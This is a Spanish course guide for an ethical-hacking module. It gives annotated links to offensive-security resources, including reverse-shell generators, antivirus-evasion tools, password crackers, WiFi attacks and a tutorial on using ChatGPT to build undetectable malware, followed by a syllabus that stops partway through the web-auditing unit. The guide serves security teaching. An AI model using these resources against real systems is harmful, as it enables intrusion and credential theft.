# GUIA_ASIGNATURA — Hacking Ético 2025-2026
**CIPFP Mislata · CETI | Profesor: Ramón Onrubia Pérez**

---

## Tabla de contenidos

- [Recursos](#recursos)
- [1. Resumen general](#1-resumen-general-de-la-asignatura)
- [2. Temario completo](#2-temario-completo)
- [3. Herramientas por fase](#3-herramientas-por-fase-de-auditoría)
- [4. Tecnologías y conceptos clave](#4-tecnologías-y-conceptos-clave)
- [5. Ruta de aprendizaje](#5-ruta-de-aprendizaje)
- [6. Prácticas progresivas](#6-prácticas-progresivas)
- [7. Proyecto final integrador](#7-proyecto-final-integrador)
- [8. Tabla resumen de herramientas](#8-tabla-resumen-de-herramientas)
- [9. Tabla de conceptos clave por UD](#9-tabla-de-conceptos-clave-por-ud)
- [10. Checklist de preparación](#10-checklist-de-preparación)
- [11. Resumen en 30 segundos](#11-resumen-en-30-segundos)
- [12. Índice de enlaces](#12-índice-de-enlaces)

---

## Recursos

### Documentación oficial

- [INCIBE – Hacking ético y sus beneficios empresariales](https://www.incibe.es/protege-tu-empresa/blog/el-hacking-etico-y-sus-beneficios-el-mundo-empresarial) — Introducción oficial al hacking ético en entornos empresariales.
- [INCIBE-CERT – CVSS 4.0: avanzando en la evaluación](https://www.incibe.es/incibe-cert/blog/cvss-v40-avanzando-en-la-evaluacion-de-vulnerabilidades) — Guía oficial de las métricas CVSS 4.0.
- [INCIBE-CERT – CVSS 3.0](https://www.incibe-cert.es/blog/cvss3-0) — Explicación de las métricas de la versión 3.x.
- [INCIBE-CERT – DrDoS, características y funcionamiento](https://www.incibe-cert.es/blog/drdos-caracteristicas-y-funcionamiento) — Ataques de amplificación distribuida.
- [NVD / NIST – National Vulnerability Database](https://nvd.nist.gov) — Catálogo de vulnerabilidades con puntuaciones CVSS y detalles técnicos.
- [CVE – MITRE](https://cve.mitre.org) — Identificadores únicos de vulnerabilidades conocidas públicamente.
- [CWE – MITRE](https://cwe.mitre.org) — Catálogo de debilidades de software.
- [CAPEC – MITRE](https://capec.mitre.org) — Patrones comunes de ataque.
- [ATT&CK – MITRE](https://attack.mitre.org) — TTP de grupos APT y atacantes reales; referencia para Red/Blue Team.
- [ATT&CK Enterprise Matrix – MITRE](https://attack.mitre.org/matrices/enterprise/) — Matriz completa de tácticas y técnicas del entorno empresarial.
- [MITRE ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/) — Herramienta interactiva para explorar y anotar la matriz ATT&CK.
- [MITRE ATLAS](https://atlas.mitre.org/) — Base de conocimiento de tácticas y técnicas de ataque contra sistemas de IA.
- [CVE Details](https://www.cvedetails.com) — Estadísticas y detalles de vulnerabilidades por producto y versión.
- [FIRST – Calculadora CVSS 4.0](https://www.first.org/cvss/calculator/4.0) — Calculadora oficial de puntuaciones CVSS.
- [Microsoft Docs – Seguridad SMB / cifrado SMB3](https://learn.microsoft.com/es-es/windows-server/storage/file-server/smb-security) — Documentación oficial para cifrar recursos SMB.
- [MDN Web Docs – Content Security Policy](https://developer.mozilla.org/es/docs/Web/HTTP/CSP) — Referencia estándar de CSP.
- [Shodan CLI – Referencia de comandos](https://cli.shodan.io/) — Documentación oficial del cliente CLI de Shodan.
- [Zero Day Initiative](https://www.zerodayinitiative.com/) — Programa de reporte responsable de vulnerabilidades Zero Day.
- [GHDB – Google Hacking Database](https://www.exploit-db.com/google-hacking-database) — Base de datos de Google Dorks por categoría.
- [HSTS Preload](https://hstspreload.org) — Lista precargada de dominios que exigen HTTPS en navegadores.
- [LOLBAS Project](https://lolbas-project.github.io/) — Binarios del SO Windows usados en ataques fileless (LOTL).
- [GTFOBins](https://gtfobins.github.io) — Binarios Unix/Linux explotables para escalada de privilegios.
- [LOLDrivers Project](https://www.loldrivers.io/) — Catálogo de drivers legítimos vulnerables o maliciosos usados en ataques LOTL.
- [RIPE NCC – Base de datos de rangos IP (descarga)](https://ftp.ripe.net/ripe/dbase/) — Archivo ripe.db.gz para reconocimiento de rangos IP.
- [Ley de Hacking – Art. 197 CP: ¿Debo reportar vulnerabilidades?](https://legalconsultors.es/ley-de-hacking-debo-reportar-vulnerabilidades/) — Marco legal español del pentesting.
- [¿Escanear puertos es siempre legal?](https://protecciondatos-lopd.com/empresas/escaneo-de-puertos/#Escanear_puertos_es_siempre_legal) — Análisis legal del reconocimiento activo en España.
- [Kali Linux – Descarga oficial](https://www.kali.org/get-kali/#kali-platforms) — Descarga de todas las plataformas oficiales de Kali Linux.
- [Parrot OS Security Edition – Descarga](https://www.parrotsec.org/download/) — Distribución alternativa orientada a seguridad y pentesting.
- [Metasploit Framework – Descarga](https://www.metasploit.com/download) — Framework de explotación (incluido de serie en Kali).
- [Metasploitable2 – Documentación oficial (Rapid7)](https://docs.rapid7.com/metasploit/metasploitable-2/) — Máquina vulnerable oficial para prácticas de pentesting.
- [Docker – Clave GPG del repositorio Debian](https://download.docker.com/linux/debian/gpg) — Necesaria para instalar Docker en Kali.
- [HackTheBox Academy](https://academy.hackthebox.com/) — Plataforma de formación práctica en ciberseguridad ofensiva.

### Tutoriales

- [Tutorial NMAP – Comandos más útiles](https://protegermipc.net/2018/11/07/tutorial-y-listado-de-comandos-mas-utiles-para-nmap/) — Referencia práctica de NMAP para UD1/UD2.
- [Guía práctica NMAP para Kali Linux](https://es.linux-console.net/?p=1608) — Tutorial paso a paso con ejemplos.
- [Introducción a NMAP](http://melix.mx/~bli/conf/nmap/nmap.html) — Referencia adicional de comandos NMAP.
- [Shodan CLI – Tutorial completo](https://www.flu-project.com/2020/04/shodan-cli.html) — Uso de Shodan desde línea de comandos.
- [Shodan CLI – Vídeos de ejemplo (asciinema)](https://asciinema.org/~Shodan) — Grabaciones de terminal mostrando el uso real de Shodan CLI.
- [Cómo bloquear a Shodan](https://www.busindre.com/bloquear_ips_del_escaner_shodan) — Guía para evitar que los escáneres de Shodan indexen tu infraestructura.
- [Montar servidor DNS BIND en Debian/Ubuntu](https://www.redeszone.net/tutoriales/servidores/configurar-servidor-dns-bind-linux/) — Necesario para la práctica P2 de UD1.
- [Métodos para atacar WPS con WifiSlax](https://www.redeszone.net/tutoriales/redes-wifi/metodos-crackear-wps-routers-wifi/) — Ataques WPS completos (PIN, Pixie-Dust).
- [Inyección SQL – Ejemplos prácticos con PHP](https://www.mclibre.org/consultar/php/lecciones/php-db-inyeccion-sql.html) — Código PHP vulnerable y payloads SQLi.
- [Fuzzing con OWASP ZAP – Directory Traversal](https://henryraul.wordpress.com/2017/04/02/fuzzing-con-owasp-zap-proxy-profundizando-en-el-analisis-de-directory-traversal-y-detectando-en-lote-archivos-por-defecto/) — Técnica de fuzzing con ZAP.
- [Análisis de webshell IndoXploit](https://henryraul.wordpress.com/2017/01/09/analisis-de-la-shellcode-indoxploit/) — Análisis técnico de una webshell real.
- [Introducción a OWASP ZAP](https://laprovittera.com/introducion-a-owasp-zap/) — Primer artículo de la serie completa de ZAP.
- [Escaneo con OWASP ZAP](https://laprovittera.com/escaneo-con-owasp-zap/) — Cómo realizar escaneos activos y pasivos.
- [Spider y Ajax Spider en ZAP](https://laprovittera.com/uso-de-spider-ajax-spider-en-zap/) — Enumeración automática de URLs de la aplicación.
- [Escaneo activo y Alertas en ZAP](https://laprovittera.com/escaneo-activo-y-alertas-en-zap/) — Interpretación de resultados y niveles de riesgo.
- [Informes y Automatización en ZAP](https://laprovittera.com/informes-y-automatizacion-en-zap/) — Generación de informes HTML/XML y automatización.
- [Autenticación en ZAP](https://laprovittera.com/dominando-la-autenticacion-en-zap/) — Configurar sesiones autenticadas para escaneo.
- [ZAP Marketplace – Complementos de pentesting](https://laprovittera.com/zap-marketplace-ecosistema-de-complementos-para-pentesting/) — Plugins adicionales del ecosistema ZAP.
- [Pentesting con ZAP](https://laprovittera.com/pentesting-con-zap/) — Flujo completo de pentesting web con ZAP.
- [Herramientas Avanzadas de ZAP](https://laprovittera.com/herramientas-avanzadas-de-zap/) — Funciones avanzadas: fuzzer, websocket, API.
- [Cómo crear un informe de pentesting – Parte 1](https://thehackerway.com/2021/06/24/como-crear-un-informe-de-pentesting-parte-1-de-2/) — Estructura y secciones de un informe.
- [Cómo crear un informe de pentesting – Parte 2](https://thehackerway.com/2021/06/28/como-crear-un-informe-de-pentesting-parte-2-de-2/) — Detalles técnicos y recomendaciones.
- [Ataques WPS con NetHunter](https://www.mobile-hacker.com/2023/10/31/nethunter-hacker-x-wps-attacks/) — WPS desde Kali NetHunter en móvil.
- [Evil Twin y Rogue AP con NetHunter](https://www.mobile-hacker.com/2023/10/05/nethunter-hacker-ix-use-mana-toolkit-to-create-wi-fi-rogue-access-point-and-intercept-traffic/) — Ataques Rogue AP con Mana Toolkit.
- [SPF – Sintaxis y estructura de registro](https://easydmarc.com/blog/es/sintaxis-de-registro-spf-estructura-y-componentes/) — Cómo construir y leer registros SPF.
- [Guía definitiva DMARC/DKIM/SPF](https://dmarcly.com/blog/how-to-implement-dmarc-dkim-spf-to-stop-email-spoofing-phishing-the-definitive-guide) — Implementación completa de seguridad de correo.
- [Cómo funciona DMARC con subdominios (dmarcly)](https://dmarcly.com/blog/how-dmarc-works-with-subdomains-dmarc-sp-tag) — Uso de la etiqueta `sp` para políticas de subdominios.
- [Cómo funciona DMARC con subdominios (Valimail)](https://www.valimail.com/blog/how-dmarc-works-with-subdomains/) — Explicación alternativa del comportamiento de DMARC en subdominios.
- [Correo seguro con ARC y DANE/TLSA](https://blog.elhacker.net/2024/04/configurar-email-seguro-arc-dane-tlsa.html) — Configuración avanzada de seguridad en correo.
- [Pixie-Dust – Detalles técnicos (Foro Kali)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-%28Offline-WPS-Attack%29) — Ataque Pixie-Dust offline contra WPS.
- [Pixie-Dust – wifi-libre (copia de archivo)](https://web.archive.org/web/20230330021239/https://www.wifi-libre.com/topic-57-pixie-dust-ataque-de-fuerza-bruta-offline-para-generar-el-pin-valido.html) — Documentación detallada en español. ⚠️ Enlace de archivo web.
- [CVE vs CWE – Diferencias](https://www.codiga.io/blog/cve-vs-cwe/) — Aclaración conceptual en inglés.
- [Qué es un CVE y CNA en España](https://ciberseguridad.euskadi.eus/ciberpedia/vulnerabilidades/que-es-un-cve-y-entidades-en-espana-que-son-cna/) — Contexto local del sistema CVE.
- [Cracking de contraseñas con hashcat (Security Artwork)](https://www.securityartwork.es/2017/02/15/cracking-contrasenas-hashcat/) — Introducción práctica a hashcat y sus modos de ataque.
- [Cheatsheet: Pivoting con SSH y Meterpreter](https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/) — Técnicas de pivoting combinando SSH y Meterpreter.
- [Cómo utilizar CUPP para generar diccionarios](https://esgeeks.com/como-utilizar-cupp/) — Generación de wordlists personalizadas basadas en datos de la víctima.
- [Sherlock – Escalada de privilegios en Windows](https://www.hackplayers.com/2017/04/sherlock-un-script-powershell-escalar-privilegios.html) — Script PowerShell para detectar vías de escalada.
- [PrivescCheck – Enumeración y escalada en Windows](https://esgeeks.com/privesccheck-enumeracion-escalar-privilegios-windows/) — Herramienta de auditoría de configuración para escalada de privilegios.
- [Meterpreter: conceptos básicos y comandos habituales](https://thehackerway.com/2011/04/26/conceptos-basicos-de-meterpreter-metasploit-framework/) — Introducción práctica a Meterpreter.
- [Veil-Evasion, Shellter y PayDay para ofuscar binarios](https://www.elladodelmal.com/2016/04/veil-evasion-shellter-payday-para.html) — Comparativa de herramientas de evasión de antivirus.
- [Uso de Empire Framework contra sistemas Windows](https://thehackerway.com/2019/09/02/uso-de-empire-framework-contra-sistemas-windows/) — Post-explotación con agentes PowerShell.
- [Rubber Ducky USB: así se puede atacar un ordenador](https://www.redeszone.net/2018/03/17/rubber-ducky-usb-atacar-ordenador/) — Funcionamiento de los ataques HID con Rubber Ducky.
- [Creación de tarea programada con PowerShell](https://adamtheautomator.com/powershell-scheduled-task/) — Persistencia mediante tareas programadas.
- [Cómo crear malware indetectable con ChatGPT](https://noticiasseguridad.com/tutoriales/como-crear-malware-indetectable-a-traves-de-chatgpt-en-7-sencillos-pasos/) — Ejemplo de uso indebido de IA generativa para evasión de AV.

### Cursos

- [HackTheBox Academy](https://academy.hackthebox.com/) — Plataforma de cursos prácticos guiados de ciberseguridad ofensiva.
- [Tenable for Education – Vídeos](https://www.tenable.com/tenable-for-education) — Recursos formativos oficiales de Tenable (Nessus) para UD5.

### Blogs / artículos

- [The Jargon File – La jerga hacker](https://parceladigital.com/articulo/jargon-file-la-jerga-hacker) — Glosario histórico de términos del mundo hacker.
- [Por qué está roto el protocolo WEP](https://lacriptadelhacker.wordpress.com/2022/01/06/hacking-wifi-por-que-el-protocolo-wep-esta-roto/) — Explicación técnica profunda de las debilidades de WEP.
- [Vulnerabilidad BIAS en Bluetooth (2020)](https://www.xataka.com/seguridad/bias-nueva-vulnerabilidad-bluetooth-que-afecta-a-todos-dispositivos-no-actualizados-recientemente) — Impersonation attack en Bluetooth.
- [Vulnerabilidad BLUFFS en Bluetooth (2023)](https://www.xatakandroid.com/seguridad/no-vas-a-usar-bluetooth-mejor-que-apagues-lugares-publicos-asi-peligrosos-ataques-bluffs) — Ataque de downgrade en Bluetooth.
- [Hackear mandos de coche con vulnerabilidad RKE](https://noticiasseguridad.com/seguridad-informatica/como-hackear-un-auto-con-vulnerabilidades-de-remote-keyless-entry-rke/) — Vulnerabilidades RF en automoción.
- [DMARC – La protección del correo electrónico](https://unaaldia.hispasec.com/2022/10/que-es-dmarc-la-necesidad-de-la-proteccion-del-correo-electronico.html) — Por qué implementar DMARC.
- [CVSS 4.0 – Nueva versión de evaluación](https://unaaldia.hispasec.com/2023/11/cvss-4-0-nueva-version-de-evaluacion-de-vulnerabilidades.html) — Análisis de las novedades de CVSS 4.0.
- [HPKP – Cuando una medida de seguridad deja de ayudar](https://www.elladodelmal.com/2020/01/hkpk-cuando-una-medida-de-seguridad.html) — Por qué se abandonó HTTP Public Key Pinning.
- [Certificate Transparency – GlobalSign](https://www.globalsign.com/es/blog/what-is-certificate-transparency) — Explicación de CT como sustituto de HPKP.
- [Certificate Transparency – el qué, el cómo y el porqué](https://empresas.blogthinkbig.com/certificate-transparency-el-que-el-como/) — Profundización en CT y SCT.
- [Ataque Rapid Reset HTTP/2 (CVE-2023-44487)](https://www.hackplayers.com/2023/10/probando-la-vulnerabilidad-rapid-reset.html) — Análisis y prueba del DoS en HTTP/2 (398 M rps).
- [SSRF – Cómo explotar y hacer XSPA](https://www.elladodelmal.com/2015/04/ssrf-server-side-request-forgery-xspa.html) — Técnica avanzada Server-Side Request Forgery.
- [HTML Smuggling – Contrabando de HTML](https://cyberseguridad.net/contrabando-de-html-html-smuggling-ataques-informaticos-xviii) — Técnica de bypass de sistemas de seguridad.
- [XML External Entity Attack – Wikipedia](https://en.wikipedia.org/wiki/XML_external_entity_attack) — Referencia conceptual de XXE.
- [802.11ac Wave 2, Beamforming y MU-MIMO](https://naseros.com/2018/11/05/802-11-ac-wave-2-beamforming-y-mu-mimo/) — Tecnología WiFi de alta densidad.
- [MU-MIMO: qué es y por qué mejora el WiFi](https://www.redeszone.net/tutoriales/redes-wifi/mu-mimo-que-es-mejora-rendimiento-wifi/) — Explicación práctica de MU-MIMO.
- [Qué es WiFi 6 y cómo mejora la red](https://www.xataka.com/especiales/que-wifi-6-que-va-a-mejorar-tu-red-wifi-casa-cuando-te-conectes-a-publica) — Características de 802.11ax.
- [WiFi 6E vs WiFi 6 – diferencias](https://www.xataka.com/basics/wifi-6e-vs-wifi-6-que-cuales-sus-diferencias) — Comparativa de estándares WiFi actuales.
- [Introducción a ZigBee](https://www.securityartwork.es/2023/01/24/introduccion-a-zigbee/) — Protocolo inalámbrico para IoT.
- [RA en PKI – techtarget](https://www.techtarget.com/searchsecurity/definition/registration-authority) — Funciones de la Autoridad de Registro en una PKI.
- [Artículos sobre NMAP – h1rd.com](http://www.h1rd.com/tags/nmap.html) — Colección de artículos técnicos sobre NMAP.
- [El malware de tipo "Ramónware" (LinkedIn)](https://py.linkedin.com/posts/raulguillen_rtve-humor-ciber-activity-6999642097863520256-npsX) — Publicación humorística/divulgativa del profesor sobre ransomware.
- [Top de herramientas y gadgets para hardware hacking](https://foro.hackhispano.com/threads/48688-Top-de-herramientas-y-gadgets-para-hardware-hacking) — Recopilación de dispositivos para pentesting físico.
- [Malduino: BadUSB al alcance de todos](https://www.neoteo.com/malduino-badusb-al-alcance-todos/) — Dispositivo BadUSB de bajo coste.
- [BadUSB: malware que infecta dispositivos USB](https://www.neoteo.com/badusb-malware-que-infecta-dispositivos-usb/) — Explicación del funcionamiento de BadUSB.
- [Qué es un "air gap" y por qué es importante frente al ransomware](https://www.computerweekly.com/es/opinion/Que-es-un-air-gap-y-por-que-es-importante-frente-a-los-ataques-de-ransomware) — Concepto de aislamiento físico de redes; también referenciado a propósito de Bash Bunny.
- [badBIOS: el malware que se transmite por ultrasonidos](https://computerhoy.com/noticias/software/virus-badbios-contamina-pcs-sonido-usando-microfono-44598) — Caso histórico de malware con canal encubierto acústico.
- [GOAD – Game Of Active Directory (segu-info)](https://blog.segu-info.com.ar/2023/11/goad-game-of-active-directory-pentesting.html?m=1) — Presentación del laboratorio GOAD para prácticas de AD.
- [Bug Bounty: cómo funciona la caza de vulnerabilidades](https://www.welivesecurity.com/la-es/2020/01/21/bug-bounty-como-funciona-hacking-etico-caceria-vulnerabilidades/) — Introducción a los programas de recompensas por vulnerabilidades.
- [Sistemas vulnerables para practicar pentesting legalmente](https://blog.elhacker.net/2022/02/sistemas-vulnerables-para-practicar-legalmente-pentesting.html?m=1) — Listado de entornos legales para laboratorio.

### Vídeos

- [Charla introductoria – Hacking Ético (Drive)](https://drive.google.com/file/d/1UQndaXjnD2BjsKBIqsF48gNVorrnfTym/view) — Vídeo introductorio del profesor (UD1). ⚠️ Enlace privado de Google Drive; puede requerir permiso.
- [Instalación de Kali Linux (YouTube)](https://www.youtube.com/watch?v=ImuMIW_oWOo) — Tutorial en vídeo de instalación de Kali Linux.
- [Cómo crear un informe de pentesting (YouTube)](https://www.youtube.com/watch?v=EOoBAq6z4Zk) — Vídeo complementario a la serie de thehackerway sobre informes.
- [Uso de OWASP ZAP – INCIBE (YouTube)](https://www.youtube.com/watch?v=1InikJ74654) — Tutorial en vídeo de ZAP para UD4.
- [Animación HTTP/1.1 vs HTTP/2 vs HTTP/2 Push](https://freecontent.manning.com/animation-http-1-1-vs-http-2-vs-http-2-with-push/) — Comparativa animada de versiones del protocolo HTTP.
- [Demo banco online sin HTTPS (testfire)](http://demo.testfire.net/login.jsp) — Página de demostración de banco sin HTTPS. ⚠️ HTTP sin cifrar: no introducir datos reales.

### GitHub / repositorios

- [BishopFox – Informes de pentesting públicos](https://github.com/BishopFox/public-pentesting-reports) — Modelos de informes reales de auditorías de seguridad.
- [Sector443 – Awesome pentesting reports](https://github.com/Sector443/awesome-list-of-public-pentesting-reports) — Lista curada de informes públicos de pentesting.
- [raikar – pentesting-reports](https://github.com/raikar/pentesting-reports) — Otra colección de informes de pentesting reales.
- [vanhoefm/macstealer – Ataque MacStealer WiFi](https://github.com/vanhoefm/macstealer) — PoC del ataque MacStealer contra redes WiFi.
- [digininja/CeWL](https://github.com/digininja/CeWL) — Generador de listas de palabras personalizadas a partir de contenido web.
- [swisskyrepo/PayloadsAllTheThings – Reverse Shell Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) — Referencia exhaustiva de reverse shells por lenguaje.
- [t0thkr1s/revshellgen](https://github.com/t0thkr1s/revshellgen) — Generador automático de reverse shells.
- [carlospolop/PEASS-ng](https://github.com/carlospolop/PEASS-ng) — Scripts de enumeración para escalada de privilegios (Linux/Windows).
- [Orange-Cyberdefense/GOAD](https://github.com/Orange-Cyberdefense/GOAD) — Laboratorio "Game Of Active Directory" para practicar ataques a AD.
- [vxcontrol/pentagi](https://github.com/vxcontrol/pentagi) — Proyecto de pentesting asistido por agentes de IA.

### Referencias

- [SSLLabs – Test de SSL/TLS](https://www.ssllabs.com/) — Audita la configuración TLS de servidores y navegadores (UD4 P1).
- [CrackStation – Rainbow tables online](https://crackstation.net) — Cracking online de hashes MD5/NTLM (UD5 P2).
- [L0phtCrack](https://l0phtcrack.gitlab.io/) — Cracker de contraseñas Windows (UD5 P2).
- [Diccionarios WPA/WPA2 para fuerza bruta](https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html) — Fuentes de wordlists para ataques de diccionario (UD3).
- [Convertir CAP a HCCAPX para Hashcat](https://hashcat.net/cap2hashcat/) — Conversión online de capturas WiFi para Hashcat (UD3).
- [Google Toolbox – Dig online](https://toolbox.googleapps.com/apps/dig/) — Consultas DNS desde el navegador (UD1).
- [MXToolbox – DNS Lookup](https://mxtoolbox.com/DnsLookup.aspx) — Herramienta online de resolución DNS (UD1).
- [MXToolbox – SPF Record Checker](https://mxtoolbox.com/spf.aspx) — Verificar registros SPF de un dominio (UD1).
- [EasyDMARC – SPF Lookup](https://easydmarc.com/tools/spf-lookup) — Comprobación online de registros SPF.
- [Mail-Tester](https://www.mail-tester.com/) — Comprueba el grado de spam de correos propios (UD1).
- [ViewDNS.info](https://viewdns.info/) — Suite de herramientas DNS y de red online (UD1).
- [DNS Checker – Herramientas completas](https://dnschecker.org/all-tools.php) — Herramientas DNS globales (UD1).
- [CentralOps – Network tools](https://centralops.net/co/) — Herramientas de red y DNS online (UD1).
- [Estadísticas de uso de HTTP/2 – W3Techs](https://w3techs.com/technologies/details/ce-http2) — Adopción real de HTTP/2 en la web (UD4).
- [inSSIDer – Analizador WiFi](https://www.metageek.com/products/inssider/) — Escáner gráfico de redes WiFi (UD3).
- [CSP Evaluator (Google)](https://csp-evaluator.withgoogle.com/) — Evalúa la robustez de una política CSP (UD4).
- [Weakpass – Diccionarios de contraseñas](https://weakpass.com/wordlist) — Repositorio de wordlists para ataques de diccionario (UD5).
- [Weakpass – Crack JS](https://weakpass.com/crack-js) — Cracker de hashes en el navegador vía JavaScript (UD5).
- [Kaspersky Password Checker](https://password.kaspersky.com/es/) — Estima el tiempo de crackeo de una contraseña (UD5).
- [Reverse Shell Generator (revshells.com)](https://www.revshells.com/) — Generador online de payloads de reverse shell (UD5).
- [Check Point Evasion Techniques](https://evasions.checkpoint.com/) — Catálogo de técnicas de detección/evasión de entornos virtualizados usadas por malware (UD5).

### Otros recursos

- [http.cat – Códigos de estado HTTP](https://http.cat/) — Referencia visual y divertida de códigos HTTP.
- [BeEF – Browser Exploitation Framework](https://beefproject.com/) — Sitio oficial del framework de explotación de navegadores (UD5).
- [Hak5 – LAN Turtle](https://shop.hak5.org/products/lan-turtle) — Producto hardware LAN Turtle para pentesting físico (UD5).
- [Shell Detector](http://www.shelldetector.com/) — Herramienta para detectar webshells en servidores (UD4).
- [Mapas mundiales de ciberamenazas – Cisco Talos](https://talosintelligence.com/fullpage_maps/pulse) — Visualización en tiempo real de amenazas globales.
- [Mapa de amenazas – Threatbutt](https://threatbutt.com/map/) — Mapa mundial de ciberataques (con humor).
- [Mapa de amenazas – Check Point](https://threatmap.checkpoint.com/) — Visualización en vivo de ciberataques de Check Point.
- [Mapa de amenazas – Fortinet](https://threatmap.fortiguard.com/) — Mapa de amenazas de FortiGuard Labs.
- [Mapa de amenazas – FireEye](https://www.fireeye.com/cyber-map/threat-map.html) — Visualización de ciberataques de FireEye.
- [Mapa de amenazas – Kaspersky Cybermap](https://cybermap.kaspersky.com/) — Mapa interactivo de amenazas de Kaspersky.
- [Mapa de amenazas – Bitdefender](https://threatmap.bitdefender.com/) — Visualización de ataques en tiempo real de Bitdefender.
- [Mapa de amenazas – Arbor Networks / Digital Attack Map](https://www.digitalattackmap.com/) — Mapa de ataques DDoS a nivel mundial.
- [Mapa de amenazas – Spamhaus](https://www.spamhaus.com/threat-map/) — Mapa de amenazas centrado en spam y botnets.
- [Mapa de amenazas – SonicWall](https://securitycenter.sonicwall.com/m/page/worldwide-attacks) — Mapa mundial de ataques de SonicWall.
- [Mapa de amenazas – Netscout Horizon](https://horizon.netscout.com/) — Visualización de amenazas y ataques DDoS de Netscout.
- [Mapa de amenazas – LookingGlass](https://map.lookingglasscyber.com/) — Mapa de amenazas de LookingGlass Cyber.

---

## 1. Resumen general de la asignatura

**Hacking Ético** es un módulo de ciberseguridad ofensiva cuyo objetivo es capacitar al alumno para realizar auditorías de seguridad completas de forma legal y autorizada. Se estudia todo el ciclo del pentesting: desde el marco legal y la recolección de información, pasando por el análisis de vulnerabilidades, la explotación y la post-explotación, hasta la presentación de informes. El entorno de trabajo habitual es **Kali Linux** como máquina atacante y **Metasploitable 2** como objetivo vulnerable, con aplicaciones web como **DVWA** y **Mutillidae**.

La asignatura se divide en **cinco unidades didácticas** progresivas que cubren: fundamentos y legislación, vulnerabilidades y ataques de red, auditoría de redes inalámbricas WiFi, auditoría de aplicaciones web (HTTP/HTTPS, SSL/TLS, SQLi, XSS) y auditoría de sistemas operativos (escalada de privilegios, Metasploit, persistencia y borrado de huellas).

---

## 2. Temario completo

### UD1 — Fundamentos del Hacking Ético 
[Resumen UD01](https://alyraluca.github.io/cibersecurity/Hacking%20%C3%89tico/hacking_etico_tema1.html)

- Definición de hacking, pentesting y diferencias con el análisis de vulnerabilidades
- Marco legal español: Art. 197 CP (Reforma 2015) — penas de 6 meses a 2 años
- Tipos de hackers: White Hat, Grey Hat, Black Hat, Phreaker, Script Kiddie
- Equipos: Red Team, Blue Team, Purple Team
- Conducta del hacker ético: confidencialidad, integridad, responsabilidad
- Fases del hacking ético: Contrato → Recolección → Análisis → Explotación → Post-explotación → Informes
- **Footprinting** (reconocimiento pasivo): OSINT, Google Dorking, Shodan, WHOIS, RIR (AfriNIC, ARIN, APNIC, LACNIC, RIPE NCC), ingeniería social
- **Fingerprinting** (reconocimiento activo): escaneo de red, barrido de puertos, banner grabbing, NMAP
- **Enumeración**: DNS bruteforce, transferencia de zona, SNMP, LDAP/AD
- Registros DNS: A, AAAA, MX, NS, TXT (SPF/DKIM), CNAME, PTR, SOA
- CVSS (Baja 0.1–3.9 / Media 4.0–6.9 / Alta 7.0–8.9 / Crítica 9.0–10.0)
- Tipos de auditoría: Caja Blanca, Caja Gris, Caja Negra; estrategias Blind, Double Blind, Tandem, Reversal, Double Grey Box
- Metodologías: OSSTMM, OWASP, PCI-DSS, ISSAF, PTES

### UD2 — Vulnerabilidades, Ataques y Herramientas
[Resumen UD02](https://alyraluca.github.io/cibersecurity/Hacking%20%C3%89tico/hacking_etico_tema2.html)

- Amenaza vs. Vulnerabilidad; tipos: diseño, implementación, uso
- Catálogo de vulnerabilidades tecnológicas: Buffer Overflow, Elevación de privilegios, Path Traversal, LFI/RFI, RCE, XSS, CSRF, SSRF, SQL Injection
- Zero Day: definición y ventana de vulnerabilidad
- CVSS 4.0: métricas Base, Temporal, Entorno, Suplementarias (Seguridad, Automatizable, Recuperación, Densidad de Valor)
- Fuentes de inteligencia: MITRE CVE/CWE/CAPEC/ATT&CK, NVD-NIST, CVRF (XML OASIS)
- Clasificación de ataques: local/remoto, activo/pasivo, físico/lógico
- Ataques de red: MITM (ARP Spoofing, ICMP Redirect, Rogue DHCP), SSLstrip, SSLsplit, NAT Slipstreaming, Smurf, DDoS
- Spoofing: MAC/ARP (L2), IP (L3), TCP Hijacking (L4), DNS Spoofing (L7)
- Ataques a infraestructura: protocolos de enrutamiento (RIP/OSPF/BGP), STP, DHCP Starvation, SLAAC, CAM Overflow, VLAN Hopping
- Ataques web: XSS, CSRF, SSRF, LFI/RFI, XXE, Path Traversal, RCE, SQLi
- Ingeniería social: Phishing, Spear Phishing, Vishing, Smishing, BEC
- Técnicas de evasión: ofuscación, session splitting, tunneling, esteganografía (en archivos y en red)
- Herramientas por fase: Information Gathering, Análisis de Vulnerabilidades, Explotación

### UD3 — Auditoría de Redes Inalámbricas
[Resumen UD03](https://alyraluca.github.io/cibersecurity/Hacking%20%C3%89tico/hacking_etico_tema3.html)

- Terminología: AP, STA, BSSID, SSID/ESSID, BSS, IBSS (Ad-Hoc), ESS, WDS, PMF, PMK, PTK, GTK
- Protocolos de cifrado WiFi: WEP (RC4, IV 24 bits, CRC-32, sin gestión de claves) → WPA (RC4+TKIP, IV 48 bits, MIC) → WPA2 (AES-CCMP, 802.11i completo) → WPA3 (AES-GCMP-256, SAE/Dragonfly)
- WEP a fondo: stream cipher RC4, XOR keystream, modos Open/Shared, WEP dinámico (clave de asignación = unicast; clave predeterminada = broadcast)
- Handshake WPA de 4 vías: ANonce, SNonce, PTK, GTK, MIC
- KRACK (2017): reinstalación de claves en handshake WPA2
- Ataque PMKID (2018): sin clientes conectados
- WPS: PIN (8 dígitos → 11.000 combinaciones), PBC, NFC; ataques online (fuerza bruta) y offline (Pixie-Dust: explota M3-M4)
- DragonBlood (2019): ataque de downgrade WPA3→WPA2
- Vulnerabilidades: claves estáticas WEP, RC4 inseguro, IV de 24 bits, sin numeración de tramas, contraseñas débiles, configuraciones de fábrica
- DoS inalámbrico: jamming, desautenticación (evitada con PMF), interferencias (microondas, DECT)
- Proceso de auditoría WiFi: 5 pasos — Reconocimiento → Análisis → Ataques → Cifrado → Informes
- Footprinting pasivo (airodump-ng, modo monitor) vs. activo (tramas probe)
- Descubrimiento de SSID oculto: capturar tramas de re-asociación tras deauth

### UD4 — Auditoría de Aplicaciones Web
[Resumen UD04](https://alyraluca.github.io/cibersecurity/Hacking%20%C3%89tico/hacking_etico_tema4.html)

- HTTP: historia, puerto 80/TCP, stateless, cookies; métodos (GET, POST, HEAD, PUT, DELETE, OPTIONS, TRACE); códigos de estado 1xx–5xx
- HTTP/2: multiplexación, server push, protocolo binario, HPACK; CVE-2023-44487 (Rapid Reset)
